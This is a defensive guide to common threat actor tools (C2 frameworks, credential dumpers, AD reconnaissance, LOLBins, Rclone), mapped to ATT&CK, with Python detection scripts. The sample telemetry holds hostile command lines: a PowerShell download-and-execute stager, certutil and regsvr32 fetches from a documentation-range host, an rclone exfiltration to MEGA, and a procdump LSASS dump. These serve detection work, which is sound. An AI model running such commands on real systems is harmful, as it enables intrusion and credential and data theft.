Threat Actor Tools: The Complete Guide for Defenders
Eighty-four percent of high-severity cyberattacks in 2024 leveraged legitimate system tools rather than custom malware (Vectra AI). Cobalt Strike remains a fixture of ransomware intrusions, and credential-dumping tools like Mimikatz are ubiquitous across both nation-state and criminal operations.
Understanding these tools, and what their presence signals, belongs in every defender's strategy and knowledge base.
This guide maps the threat actor toolkit to real-world tradecraft. Each tool category is tied to MITRE ATT&CK techniques and the threat groups known to deploy them. The goal is practical: help defenders recognise these tools in their environments and understand what each capability signals about attacker intent.
Why Threat Actors Use Legitimate Tools
The shift toward dual-use tools is deliberate. When attackers deploy Cobalt Strike, Mimikatz, or Rclone, they're exploiting a fundamental defender problem: these tools serve legitimate purposes.
PowerShell appears in 71% of living-off-the-land (LOTL) attacks (Vectra AI). System administrators use it daily, and many security controls allow-list it by default. That is the detection gap attackers exploit.
CrowdStrike's 2025 Global Threat Report found 62% of detections were malware-free attacks using LOTL methods. Fortra's crackdown on pirated Cobalt Strike reduced unauthorised copies in the wild by 80%, but attackers simply pivoted to alternatives like Sliver, Brute Ratel, and Havoc.
The tools keep evolving, but the goal is constant: evade detection.
Command and Control Frameworks
C2 frameworks give attackers persistent, stealthy access to compromised networks. They're the backbone of virtually every modern intrusion.
Cobalt Strike
Cobalt Strike remains the dominant post-exploitation framework despite years of defender focus. Its Beacon implant provides command execution, credential harvesting, lateral movement, and payload delivery through encrypted channels.
ATT&CK Techniques: T1071 (Application Layer Protocol), T1055 (Process Injection), T1059 (Command and Scripting Interpreter)
Known Users: APT29 (Cozy Bear), APT41, FIN6, FIN7, Black Basta, LockBit affiliates, Conti, Ryuk operators
Once a stager has loaded it, Beacon runs in memory rather than from a file on disk. It supports HTTP, HTTPS, DNS, and SMB channels and can be extensively customised through Malleable C2 profiles. It integrates Mimikatz for credential theft and provides DCSync functionality for domain hash extraction.
Recent developments include takedown efforts that reduced pirated copies significantly, driving some actors toward alternatives.
Sliver
Sliver emerged as the primary open-source alternative to Cobalt Strike. Written in Go, it supports mutual TLS, WireGuard, HTTP(S), and DNS for C2 communications.
ATT&CK Techniques: T1071 (Application Layer Protocol), T1572 (Protocol Tunneling)
Known Users: DEV-0237 (FIN12), Ryuk affiliates, Hive operators, various APT groups
Microsoft observed nation-state actors, ransomware groups, and cybercriminals integrating Sliver into attack chains. Team Cymru linked campaigns targeting government, telecom, and higher education sectors to Sliver-based infrastructure.
Brute Ratel
Brute Ratel markets itself as a red team tool but is actively abused by threat actors. Its Badger implant evades many EDR solutions through techniques such as indirect syscalls and sleep-time memory obfuscation.
ATT&CK Techniques: T1055 (Process Injection), T1134 (Access Token Manipulation)
Known Users: Qbot operators, Black Basta affiliates
The tool supports DLL, executable, PowerShell, and service binary payloads. It provides SMB lateral movement, privilege escalation, and process injection capabilities. Security vendors increasingly flag Brute Ratel, but detection remains challenging.
Other C2 Frameworks
Several frameworks round out the threat actor toolkit:
Metasploit - The original open-source exploitation framework. Still widely used for initial access and as a payload delivery mechanism. Meterpreter payloads provide extensive post-exploitation capabilities.
Empire - PowerShell-based post-exploitation framework favoured for credential theft and lateral movement. Frequently observed in espionage campaigns.
Mythic - Modular C2 with agents for Windows, macOS, and Linux. Supports TCP, HTTP, DNS, and SMB protocols. Growing adoption among sophisticated actors.
PoshC2 - PowerShell-based C2 used in APT campaigns. Lightweight and highly customisable.
Havoc - Modern C2 framework gaining traction as Cobalt Strike alternatives become necessary.
Credential Theft and Dumping Tools
Credential access represents the pivot point in most intrusions. With valid credentials, attackers move laterally without triggering malware-based detections.
Mimikatz
Mimikatz remains the gold standard for credential extraction. Created by Benjamin Delpy as a proof of concept, it's now one of the most widely deployed threat actor tools globally.
ATT&CK Techniques: T1003 (OS Credential Dumping), T1550 (Use Alternate Authentication Material)
Known Users: APT28, APT29, Lazarus Group, OilRig, Turla, Carbanak, FIN6, virtually all ransomware operators
Mimikatz extracts plaintext passwords, NTLM hashes, Kerberos tickets, and PIN codes from Windows memory. Its modules include:
- sekurlsa - Dumps credentials from LSASS process memory
- kerberos - Manipulates Kerberos tickets for pass-the-ticket attacks
- lsadump - Pulls SAM and LSA secrets locally, and replicates domain hashes via DCSync
- crypto - Accesses CryptoAPI for certificate extraction
Cobalt Strike integrates Mimikatz directly, allowing in-memory execution without disk artifacts. This combination is a fixture of ransomware intrusions.
LSASS Dumping Tools
When direct Mimikatz execution fails, attackers dump LSASS memory for offline credential extraction:
ProcDump - Microsoft Sysinternals tool legitimately used for debugging. Attackers use procdump -ma lsass.exe to capture memory for offline analysis.
NanoDump - Purpose-built for stealth LSASS dumping. Evades many EDR solutions through syscall techniques.
SharpDump - .NET implementation for LSASS dumping. Often deployed through Cobalt Strike.
Impacket secretsdump - Python tool for extracting hashes remotely. Requires privileged access; its DCSync (DRSUAPI) path pulls domain hashes without writing to the target's disk, while the SAM/LSA secrets path works through the remote registry service.
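All four dumpers above, and Mimikatz's sekurlsa module, share one observable: a process that is not part of Windows opening a handle to lsass.exe with memory-read rights. The check below, an example added to this guide rather than code from the article or from any of the tools named, runs that logic over Sysmon Event ID 10 (ProcessAccess) records. The events are constructed, and the allowlist of images that legitimately touch LSASS is a hypothetical baseline you would derive from your own telemetry.

```python
"""Flag suspicious handle opens on lsass.exe from Sysmon Event ID 10 records.

Added example for this guide, not code from the article or from any tool it
describes. Events are dicts shaped like Sysmon ProcessAccess fields; the sample
events and the allowlist below are constructed/hypothetical.
"""

# Windows PROCESS_* access rights that dumpers need (documented constant values).
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Hypothetical baseline: images that legitimately open LSASS in this estate. Build
# yours from a few days of Event ID 10 data, keyed on full path, not file name.
ALLOWLISTED_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def is_suspicious_lsass_access(event):
    """Return a reason string if the event looks like a credential dump, else None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLISTED_SOURCE_IMAGES:
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)

    # Mimikatz sekurlsa, procdump and MiniDumpWriteDump-based dumpers all need
    # VM_READ plus a query right: 0x1010 and 0x1410 are the classic masks.
    if granted == PROCESS_ALL_ACCESS:
        return f"{source} opened lsass.exe with PROCESS_ALL_ACCESS"
    if granted & PROCESS_VM_READ and granted & (
        PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION
    ):
        return f"{source} opened lsass.exe with memory-read access 0x{granted:x}"
    # Handle-duplication dumpers open LSASS for DUP_HANDLE and read via a copied handle.
    if granted & PROCESS_DUP_HANDLE:
        return f"{source} requested PROCESS_DUP_HANDLE on lsass.exe"
    return None


def triage(events):
    """Return (UtcTime, reason) for every event that trips the check, in input order."""
    hits = []
    for event in events:
        reason = is_suspicious_lsass_access(event)
        if reason:
            hits.append((event.get("UtcTime"), reason))
    return hits


LSASS = r"C:\Windows\system32\lsass.exe"
# Constructed sample telemetry: one allowlisted AV read, one benign query-only open,
# a renamed ProcDump-style dumper in a public folder, and rundll32 (comsvcs MiniDump).
SAMPLE_EVENTS = [
    {"EventID": 10, "UtcTime": "2025-03-04 10:01:02", "TargetImage": LSASS,
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "UtcTime": "2025-03-04 10:02:15", "TargetImage": LSASS,
     "SourceImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "UtcTime": "2025-03-04 10:03:40", "TargetImage": LSASS,
     "SourceImage": r"C:\Users\Public\pd.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "UtcTime": "2025-03-04 10:04:01", "TargetImage": LSASS,
     "SourceImage": r"C:\Windows\System32\rundll32.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "UtcTime": "2025-03-04 10:04:02",
     "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe"},
]

if __name__ == "__main__":
    for when, reason in triage(SAMPLE_EVENTS):
        print(when, reason)
```

The access mask is the signal, not the tool name: a renamed ProcDump and rundll32 loading comsvcs.dll both surface with 0x1010 or 0x1FFFFF. Keep the allowlist keyed on full path; an attacker can call a dumper svchost.exe but cannot easily drop it into System32.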
Kerberos Attack Tools
Active Directory's Kerberos implementation creates attack surface that threat actors routinely exploit:
Rubeus - C# toolset for Kerberos attacks including Kerberoasting, AS-REP roasting, ticket manipulation, and delegation abuse.
ATT&CK Techniques: T1558 (Steal or Forge Kerberos Tickets)
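Kerberoasting leaves a distinctive trace in Event ID 4769 on the domain controllers: one account requesting service tickets for many distinct service accounts in a short burst, typically with RC4 (encryption type 0x17) when the rest of the domain uses AES. The detection below is an added example for this guide, not code from the article or from Rubeus; the events are constructed and the five-SPN, five-minute thresholds are hypothetical starting points.

```python
"""Spot Kerberoasting-style ticket requests in Windows Security Event 4769 data.

Added example for this guide, not code from the article or from Rubeus. The
events are constructed; the window and threshold are hypothetical starting
points to tune against your own baseline of service-ticket activity.
"""
from collections import defaultdict
from datetime import datetime

RC4_HMAC = 0x17            # TicketEncryptionType for RC4, the downgrade Kerberoasting prefers
SPN_THRESHOLD = 5          # distinct service accounts requested by one principal in the window
WINDOW_SECONDS = 300


def detect_kerberoasting(events, spn_threshold=SPN_THRESHOLD,
                         window_seconds=WINDOW_SECONDS, etypes=frozenset({RC4_HMAC})):
    """Return {requesting account: sorted distinct services} for accounts that
    obtained service tickets for >= spn_threshold distinct services inside a
    sliding window. etypes=None drops the RC4 filter, which you need if the
    attacker requests AES tickets (Rubeus can) in an AES-only domain."""
    per_account = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue                                   # only successful TGS requests
        if etypes is not None and int(e.get("TicketEncryptionType", "0x0"), 16) not in etypes:
            continue
        service = e.get("ServiceName", "")
        if service.endswith("$") or service.lower() == "krbtgt":
            continue                                   # host and TGT tickets are normal noise
        when = datetime.strptime(e["TimeCreated"], "%Y-%m-%d %H:%M:%S")
        per_account[e["TargetUserName"]].append((when, service))

    flagged = {}
    for account, requests in per_account.items():
        requests.sort()
        in_window = defaultdict(int)                   # service -> requests inside the window
        start = 0
        for t_end, service in requests:
            in_window[service] += 1
            while (t_end - requests[start][0]).total_seconds() > window_seconds:
                old = requests[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= spn_threshold:
                flagged[account] = sorted({s for _, s in requests})
                break
    return flagged


def _ev(ts, user, service, etype, status="0x0"):
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status}


# Constructed sample: jdoe roasts six SPNs with RC4 in nine seconds, asmith requests
# five AES tickets (normal-looking unless you drop the RC4 filter), bjones is quiet.
SAMPLE_EVENTS = [
    _ev("2025-03-04 09:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17"),
    _ev("2025-03-04 09:00:02", "jdoe@CORP.LOCAL", "svc_web", "0x17"),
    _ev("2025-03-04 09:00:02", "jdoe@CORP.LOCAL", "WS01$", "0x12"),
    _ev("2025-03-04 09:00:03", "jdoe@CORP.LOCAL", "svc_backup", "0x17"),
    _ev("2025-03-04 09:00:04", "jdoe@CORP.LOCAL", "svc_sccm", "0x17"),
    _ev("2025-03-04 09:00:05", "jdoe@CORP.LOCAL", "svc_iis", "0x17"),
    _ev("2025-03-04 09:00:09", "jdoe@CORP.LOCAL", "svc_ldap", "0x17", status="0x1b"),
    _ev("2025-03-04 09:00:10", "jdoe@CORP.LOCAL", "svc_ldap", "0x17"),
    _ev("2025-03-04 09:00:15", "asmith@CORP.LOCAL", "svc_sql", "0x12"),
    _ev("2025-03-04 09:00:16", "asmith@CORP.LOCAL", "svc_web", "0x12"),
    _ev("2025-03-04 09:00:17", "asmith@CORP.LOCAL", "svc_backup", "0x12"),
    _ev("2025-03-04 09:00:18", "asmith@CORP.LOCAL", "svc_sccm", "0x12"),
    _ev("2025-03-04 09:00:19", "asmith@CORP.LOCAL", "svc_iis", "0x12"),
    _ev("2025-03-04 09:30:00", "bjones@CORP.LOCAL", "svc_sql", "0x17"),
    _ev("2025-03-04 12:10:00", "bjones@CORP.LOCAL", "svc_web", "0x17"),
]

if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(account, "->", ", ".join(services))
```

In a domain that still issues RC4 tickets routinely the encryption-type filter does little and the cardinality check has to carry the detection; in an AES-only domain Rubeus can request AES tickets instead, which is why the function accepts etypes=None. Either way, the fix that removes the attack surface is long random passwords (or group managed service accounts) on the service accounts the query returns.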
Password Recovery Tools
LaZagne - Extracts saved passwords from browsers, email clients, databases, and sysadmin tools. Supports Windows, Linux, and macOS.
Active Directory Reconnaissance
Understanding Active Directory relationships is essential for attackers planning lateral movement. These tools map attack paths through complex environments.
BloodHound
BloodHound uses graph theory to visualise Active Directory relationships and identify attack paths. It reveals hidden connections between users, groups, computers, and domain controllers that would otherwise require extensive manual analysis.
ATT&CK Techniques: T1087 (Account Discovery), T1069 (Permission Groups Discovery)
Known Users: Black Basta, APT groups, nearly all sophisticated ransomware operators
Data collection occurs through SharpHound (C#), SoapHound (which talks to Active Directory Web Services over SOAP), or ShadowHound (PowerShell). The collectors query LDAP, SMB, and Active Directory Web Services to map:
- User-group memberships and permissions
- Logon sessions revealing which users access which computers
- Trust relationships between domains
- Attack paths to domain admin privileges
BloodHound is frequently deployed early in intrusions. Detecting SharpHound activity often indicates reconnaissance preceding lateral movement.
CrackMapExec
CrackMapExec (CME), now continued as NetExec (nxc), automates Active Directory exploitation. It performs credential testing, share enumeration, command execution, and post-exploitation across large environments.
ATT&CK Techniques: T1021 (Remote Services), T1135 (Network Share Discovery)
The tool supports SMB, WinRM, SSH, LDAP, and MSSQL protocols. Attackers use it to spray credentials, enumerate shares, and execute commands across many hosts simultaneously.
Additional AD Tools
Impacket Suite - Python collection for SMB, Kerberos, and NTLM attacks. Includes secretsdump, psexec, wmiexec, and numerous protocol-specific tools.
Responder - Captures credentials through LLMNR, NBT-NS, and mDNS poisoning. Effective on networks where these fallback name-resolution protocols remain enabled.
PowerView/SharpView - AD enumeration tools often used alongside BloodHound for detailed reconnaissance.
Lateral Movement Tools
Once attackers establish a foothold and obtain credentials, lateral movement spreads access across the network.
PsExec and Variants
PsExec enables remote command execution through SMB. Legitimate administrators use it daily, which makes malicious usage difficult to distinguish.
ATT&CK Techniques: T1021.002 (SMB/Windows Admin Shares), T1569 (System Services)
Known Users: Virtually all ransomware operators, APT groups, crimeware actors
Impacket's psexec.py provides similar functionality through Python. Attackers frequently rename these tools or use custom implementations to evade signature-based detection.
WMI and WinRM
Windows Management Instrumentation (WMI) and Windows Remote Management (WinRM) provide native remote execution capabilities:
wmic - Command-line WMI access for queries and remote execution
Evil-WinRM - Ruby tool for WinRM-based lateral movement, commonly used after obtaining credentials
ATT&CK Techniques: T1047 (Windows Management Instrumentation), T1021.006 (Windows Remote Management)
Remote Desktop Protocol
RDP provides interactive access once credentials are obtained. Attackers increasingly enable Restricted Admin Mode to allow pass-the-hash attacks over RDP; a change of DisableRestrictedAdmin to 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa on a host that never had the value set is worth an alert.
ATT&CK Techniques: T1021.001 (Remote Desktop Protocol)
Privilege Escalation and Evasion
After initial access, attackers need elevated privileges and must evade defensive tools.
Privilege Escalation Discovery
WinPEAS/LinPEAS - Automated scripts that enumerate misconfigurations exploitable for privilege escalation. Check for unquoted service paths, weak permissions, credential exposure, and dozens of other issues.
Seatbelt - C# tool for Windows security posture enumeration. Identifies defensive tools, credentials, and potential escalation paths.
SharpUp - Checks for common Windows privilege escalation vectors including service misconfigurations, scheduled task vulnerabilities, and DLL hijacking opportunities.
UAC Bypass and Evasion
UACME - Collection of User Account Control bypass methods. Regularly updated with new techniques as Microsoft patches existing ones.
ATT&CK Techniques: T1548 (Abuse Elevation Control Mechanism)
EDR Evasion
Modern attacks routinely include EDR evasion components:
SysWhispers - Generates direct syscall implementations to bypass EDR hooks on Windows API functions.
Process Hollowing/Injection - Techniques for hiding malicious code within legitimate processes. Cobalt Strike's process injection is heavily used.
Attackers increasingly use Bring Your Own Vulnerable Driver (BYOVD) techniques to disable security products entirely. Warp AVKiller and similar tools exploit vulnerable signed drivers to terminate EDR processes.
Living Off the Land Binaries (LOLBins)
LOLBins are legitimate Windows binaries abused for malicious purposes. The LOLBAS project documents over 200 such binaries.
Most Commonly Abused
powershell.exe - Present in 71% of LOTL attacks. Downloads payloads, executes scripts, performs reconnaissance, and communicates with C2 infrastructure.
certutil.exe - Legitimate certificate utility. Attackers use -urlcache flag to download files and -encode/-decode for Base64 operations.
bitsadmin.exe - Background Intelligent Transfer Service tool. Creates persistent download jobs that survive reboots.
mshta.exe - Executes HTML Application files. Frequently used to run malicious scripts without triggering PowerShell logging.
rundll32.exe - Executes DLL files. Abused to run malicious code and proxy execution through legitimate processes.
regsvr32.exe - Registers COM servers. Abused to execute remote scripts through "squiblydoo" and similar techniques.
ATT&CK Techniques: T1218 (System Binary Proxy Execution)
Detection Approach
Monitoring LOLBin usage requires context-aware detection. Baseline normal usage patterns, then alert on anomalies:
- PowerShell with encoded commands or suspicious parent processes
- certutil connecting to external URLs
- bitsadmin creating download jobs outside IT operations
- mshta executing content from temp directories or network locations
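To make the four bullets above concrete, here is the anomaly logic as code: an added example for this guide, not code from the article or from the LOLBAS project, run over constructed process-creation events that use Sysmon Event ID 1 / Security 4688 field names. The IT operations parent path used to baseline BITS jobs is hypothetical. Decoding the -EncodedCommand payload is included because the decoded script, not the Base64 blob, is what an analyst needs in the alert.

```python
"""Context-aware LOLBin rules over process-creation events.

Added example for this guide, not code from the article. Events are dicts using
Sysmon Event ID 1 / Security 4688 field names; the sample events and the BITS
parent allowlist are constructed/hypothetical and stand in for a real baseline.
"""
import base64
import re

OFFICE_AND_SCRIPT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                             "mshta.exe", "wscript.exe", "cscript.exe"}
BITS_ALLOWED_PARENTS = {r"c:\program files\itops\deploy.exe"}   # hypothetical IT ops tooling
USER_WRITABLE = re.compile(r"(?i)\\(users|temp|programdata|windows\\temp)\\")
URL = re.compile(r"(?i)https?://\S+")

def _image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None. PowerShell accepts any
    unambiguous prefix of the switch (-e, -ec, -enc ...), so match by prefix;
    the payload is Base64 over UTF-16LE."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if tok[0] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le", errors="replace")
            except ValueError:
                return None   # switch present but the payload is not valid Base64
    return None

def evaluate(event):
    """Return [(rule, detail), ...] for one process-creation event."""
    image = _image_name(event.get("Image", ""))
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append(("powershell_encoded_command", decoded.strip()))
        if _image_name(parent) in OFFICE_AND_SCRIPT_PARENTS:
            hits.append(("powershell_suspicious_parent", parent))
    elif image == "certutil.exe":
        url = URL.search(cmd)
        if "-urlcache" in cmd.lower() and url:
            hits.append(("certutil_download", url.group(0)))
        if re.search(r"(?i)-(en|de)code\b", cmd):
            hits.append(("certutil_base64", cmd))
    elif image == "bitsadmin.exe":
        if re.search(r"(?i)/(transfer|addfile|create|setnotifycmdline)\b", cmd) \
                and parent not in BITS_ALLOWED_PARENTS:
            hits.append(("bitsadmin_job_outside_itops", parent or "<unknown parent>"))
    elif image == "mshta.exe":
        if URL.search(cmd) or USER_WRITABLE.search(cmd) or "\\\\" in cmd \
                or re.search(r"(?i)\b(javascript|vbscript):", cmd):
            hits.append(("mshta_remote_or_temp_content", cmd))
    elif image == "regsvr32.exe":
        if re.search(r"(?i)scrobj\.dll|/i:https?://", cmd):        # "squiblydoo"
            hits.append(("regsvr32_squiblydoo", cmd))
    elif image == "rundll32.exe":
        if re.search(r"(?i)comsvcs\.dll.*minidump", cmd):          # LSASS dump via comsvcs MiniDump
            hits.append(("rundll32_comsvcs_lsass_dump", cmd))
        elif USER_WRITABLE.search(cmd) or "javascript:" in cmd.lower():
            hits.append(("rundll32_untrusted_dll_or_script", cmd))
    return hits

def scan(events):
    return [(e.get("UtcTime"), rule, detail) for e in events for rule, detail in evaluate(e)]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
# Constructed sample telemetry (198.51.100.7 is a documentation-range address).
SAMPLE_EVENTS = [
    {"UtcTime": "2025-03-04 11:00:01", "Image": PS,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + base64.b64encode(STAGER.encode("utf-16-le")).decode()},
    {"UtcTime": "2025-03-04 11:00:09", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\Users\Public\x.txt"},
    {"UtcTime": "2025-03-04 11:05:00", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Program Files\ITOps\deploy.exe",          # allowlisted parent: no alert
     "CommandLine": r"bitsadmin /transfer pkg https://updates.example.com/pkg.msi C:\ProgramData\pkg.msi"},
    {"UtcTime": "2025-03-04 11:07:12", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\inv.hta"},
    {"UtcTime": "2025-03-04 11:09:30", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://198.51.100.7/r.sct scrobj.dll"},
    {"UtcTime": "2025-03-04 11:15:00", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]
```

Running scan(SAMPLE_EVENTS) yields five hits from the first, second, fourth and fifth events and nothing for the baselined BITS job or the scheduled inventory script. The parent and path context is what keeps the rules quiet on legitimate administration; without it, every one of these binaries fires constantly.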
Want to go deeper on detection? See our guide to ELK Stack Security Monitoring for hands-on SIEM implementation.
Data Exfiltration Tools
Double extortion now dominates ransomware tactics. Data theft occurs before encryption, creating leverage even if victims restore from backups.
Rclone
Rclone appeared in 57% of ransomware incidents investigated by ReliaQuest between September 2023 and July 2024. This open-source file synchronisation tool integrates with Google Drive, Amazon S3, Mega, Dropbox, and dozens of other cloud services.
ATT&CK Techniques: T1567 (Exfiltration Over Web Service)
Known Users: LockBit, Black Basta, BlackSuit, Conti, Akira
Attackers value Rclone for its speed, automation capabilities, and ability to blend with legitimate backup operations. They often rename the executable to evade static detection.
Detection strategies include monitoring for:
- Rclone processes spawned by SYSTEM
- Suspicious command-line arguments
- Large outbound transfers to cloud storage services
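The three detection strategies above turned into code, as an added example for this guide (not code from the article or from rclone). The process check relies on the fact that a renamed rclone.exe still carries rclone's PE version information, which Sysmon Event ID 1 exposes as OriginalFileName, and on rclone's command-line grammar; the volume check sums outbound bytes per host to known cloud-storage domains. The events, flows, the baselined backup job and the 5 GiB threshold are all constructed or hypothetical.

```python
"""Two Rclone-focused checks: a renamed or SYSTEM-run rclone process with
exfiltration-style arguments, and outbound volume to cloud-storage providers.

Added example for this guide, not code from the article or from rclone. Events
and flows are constructed; the remote allowlist and byte threshold are
hypothetical starting points for a real baseline.
"""
import re
from collections import defaultdict

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_FLAGS = re.compile(r"(?i)--(config|transfers|multi-thread-streams|ignore-existing|"
                          r"auto-confirm|no-check-certificate|max-age|bwlimit)\b|(?<!\S)-P(?!\S)")
# "remote:path" as rclone writes it; {2,} excludes drive letters, (?!//) excludes URLs.
REMOTE_PATH = re.compile(r"(?:^|\s)([A-Za-z0-9_-]{2,}):(?!//)\S")
KNOWN_BACKUP_JOBS = {("CORP\\svc_backup", "b2backup")}        # hypothetical (account, remote) baseline
CLOUD_STORAGE_SUFFIXES = ("mega.nz", "mega.io", "mega.co.nz", "amazonaws.com", "drive.google.com",
                          "googleapis.com", "dropbox.com", "dropboxapi.com", "backblazeb2.com", "temp.sh")

def rclone_process_hits(event):
    """Return reasons this process-creation event looks like rclone exfiltration ([] if not)."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()    # PE version info survives a rename
    cmd, user = event.get("CommandLine", ""), event.get("User", "")
    tokens = cmd.split()
    verb = next((t.lower() for t in tokens[1:] if t.lower() in RCLONE_VERBS), None)
    remote = REMOTE_PATH.search(cmd)
    flags = sorted({m.group(0) for m in RCLONE_FLAGS.finditer(cmd)})
    if "rclone.exe" not in (image, original) and not (verb and (remote or flags)):
        return []                                             # not rclone-shaped at all
    if verb and remote and (user, remote.group(1)) in KNOWN_BACKUP_JOBS:
        return []                                             # baselined backup job
    reasons = []
    if original == "rclone.exe" and image != "rclone.exe":
        reasons.append(f"renamed rclone binary: {image} (OriginalFileName={original})")
    if user.upper().endswith("\\SYSTEM") or user.upper() == "SYSTEM":
        reasons.append("rclone running as SYSTEM")
    if verb and remote:
        reasons.append(f"rclone {verb} to remote: {remote.group(1)}")
    if flags:
        reasons.append("exfil-style flags: " + ", ".join(flags))
    return reasons

def _storage_suffix(domain):
    domain = domain.lower().rstrip(".")
    for suffix in CLOUD_STORAGE_SUFFIXES:
        if domain == suffix or domain.endswith("." + suffix):
            return suffix
    return None

def exfil_volume_hits(flows, threshold_bytes=5 * 1024 ** 3):
    """Sum bytes_out per (source host, storage provider) over the flows given and
    return the pairs at or above threshold_bytes (hypothetical 5 GiB default; a
    file server and a laptop deserve different thresholds)."""
    totals = defaultdict(int)
    for flow in flows:
        provider = _storage_suffix(flow.get("dst_domain", ""))
        if provider:
            totals[(flow["src_host"], provider)] += int(flow.get("bytes_out", 0))
    return {key: total for key, total in totals.items() if total >= threshold_bytes}

# Constructed samples: a renamed rclone run as SYSTEM pushing a finance share to MEGA,
# a baselined nightly backup, a genuine svchost, and flow records for the same night.
SAMPLE_PROCESS_EVENTS = [
    {"UtcTime": "2025-03-04 02:13:00", "Image": r"C:\ProgramData\svchost.exe",
     "OriginalFileName": "rclone.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r"svchost.exe copy \\FS01\Finance mega:exfil --config C:\ProgramData\rc.conf "
                    r"--transfers 32 --ignore-existing -P"},
    {"UtcTime": "2025-03-04 01:00:00", "Image": r"C:\Program Files\rclone\rclone.exe",
     "OriginalFileName": "rclone.exe", "User": "CORP\\svc_backup",
     "CommandLine": r"rclone.exe sync D:\Backups b2backup:corp-nightly --bwlimit 20M"},
    {"UtcTime": "2025-03-04 02:13:05", "Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "svchost.exe -k netsvcs -p"},
]
SAMPLE_FLOWS = [
    {"src_host": "FS01", "dst_domain": "g.api.mega.co.nz", "bytes_out": 3_800_000_000},
    {"src_host": "FS01", "dst_domain": "gfs270n123.userstorage.mega.co.nz", "bytes_out": 2_900_000_000},
    {"src_host": "WS17", "dst_domain": "content.dropboxapi.com", "bytes_out": 120_000_000},
    {"src_host": "WS17", "dst_domain": "updates.example.com", "bytes_out": 9_000_000_000},
]
```

Rclone itself is legitimate, so the (account, remote) baseline matters: the nightly backup in the sample returns no reasons, while the renamed copy run as SYSTEM returns four. Correlating the two checks (a suspicious process on FS01 and 6.7 GB from FS01 to MEGA in the same hour) is far stronger than either alone.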
Other Exfiltration Tools
WinSCP - Open-source SFTP/FTP client. Scripting capabilities enable automated data transfers.
cURL - Command-line transfer tool native to Windows 10+. Black Basta used cURL with temp.sh for exfiltration.
FileZilla - FTP client found in ransomware toolkits alongside Rclone.
Restic - Backup utility abused to push data to attacker-controlled cloud storage.
MegaSync/MEGA CMD - Cloud storage client frequently used for staging exfiltrated data.
Tunnelling Tools
Chisel - Creates encrypted tunnels through HTTP. Used to establish covert channels for data transfer.
Socat - Multipurpose relay tool. Creates port forwards and encrypted tunnels.
Proxifier/SystemBC - SOCKS proxy tools that route traffic through compromised hosts.
Ransomware Operator Toolchains
Modern ransomware operations follow predictable patterns. Understanding typical toolchains helps defenders anticipate attacker behaviour.
Common Progression
A typical ransomware intrusion from initial access to encryption:
- Initial Access - Phishing, exploited vulnerability, or purchased access (IcedID, Qakbot, BumbleBee loaders)
- C2 Establishment - Cobalt Strike, Sliver, or Brute Ratel beacon deployed
- Credential Theft - Mimikatz, LSASS dumping, LaZagne
- Reconnaissance - BloodHound/SharpHound, network scanning
- Lateral Movement - PsExec, WMI, RDP with stolen credentials
- Exfiltration - Rclone, WinSCP to cloud storage
- Defence Evasion - Security tool disabling via BYOVD or GPO
